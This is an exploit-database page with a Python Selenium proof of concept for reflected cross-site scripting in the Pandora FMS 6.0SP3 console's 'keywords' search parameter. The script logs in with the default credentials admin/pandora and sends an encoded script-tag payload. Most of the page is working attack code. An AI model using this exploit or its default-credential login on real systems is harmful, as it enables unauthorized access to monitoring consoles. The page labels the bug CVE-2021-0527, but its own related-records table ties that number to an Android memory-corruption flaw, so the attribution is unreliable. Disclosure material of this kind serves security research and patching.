Pandora FMS 6.0SP3 Cross Site Scripting Vulnerability

🗓️ 27 May 2021 00:00:00Reported by zdtType

zdt🔗 0day.today👁 48 Views

Pandora FMS 6.0SP3 Cross Site Scripting Vulnerability in pandora console searching paramete

Reporter	Title	Published	Views	Family All 11
Android Security Bulletins	Android Security Bulletin—June 2021Stay organized with collectionsSave and categorize content based on your preferences.	7 Jun 202100:00	–	androidsecurity
Circl	CVE-2021-0527	22 Jun 202102:48	–	circl
CNNVD	Google Android 资源管理错误漏洞	27 May 202100:00	–	cnnvd
CVE	CVE-2021-0527	21 Jun 202116:01	–	cve
Cvelist	CVE-2021-0527	21 Jun 202116:01	–	cvelist
EUVD	EUVD-2021-3146	3 Oct 202520:07	–	euvd
NVD	CVE-2021-0527	21 Jun 202117:15	–	nvd
OSV	ASB-A-185193931	1 Jun 202100:00	–	osv
Packet Storm	Pandora FMS 6.0SP3 Cross Site Scripting	27 May 202100:00	–	packetstorm
Prion	Memory corruption	21 Jun 202117:15	–	prion

# Exploit Title: XSS vulnerability for (keywords) searching parameter in
pandorafms-6.0SP3/pandora_console
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Vendor: https://pandorafms.com/
# Link: https://github.com/pandorafms/pandorafms/releases
# CVE: 2021-0527-nu11secur1ty
# Proof:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-0527-nu11secur1ty

from selenium import webdriver
import time
import os, sys


# Vendor: https://pandorafms.com/
website_link="
http://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php"

# enter your login username
username="admin"

# enter your login password
password="pandora"

#enter the element for username input field
element_for_username="nick"

#enter the element for password input field
element_for_password="pass"

#enter the element for submit button
element_for_submit="login_button"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

time.sleep(3)
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit Pandora FMS 6.0 SP3-XSS-Vulnerability for (keywords) searching
parameter
time.sleep(3)
# Payload
browser.get(("
http://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php?keywords=%3Cscript%3Ealert%28%22nu11secur1ty_is_here%22%29%3B%3C%2Fscript%3E&head_search_keywords=abc"))


print("The payload is deployed, your GET parameter is vulnerable...\n")

except Exception:
#### This exception occurs if the element is not found on the webpage.
print("Sorry, but this user who you searching for is destroyed by using of
MySQL vulnerability in backend.php...")


----------------------------------------------------------------------------------------

# Exploit Title: XSS vulnerability for (keywords) searching parameter in
pandorafms-6.0SP3/pandora_console
# Date: 05.27.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://github.com/pandorafms/pandorafms/releases
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif

27 May 2021 00:00Current

7.8High risk

Vulners AI Score7.8

CVSS 24.6

CVSS 3.17.8

EPSS0.00116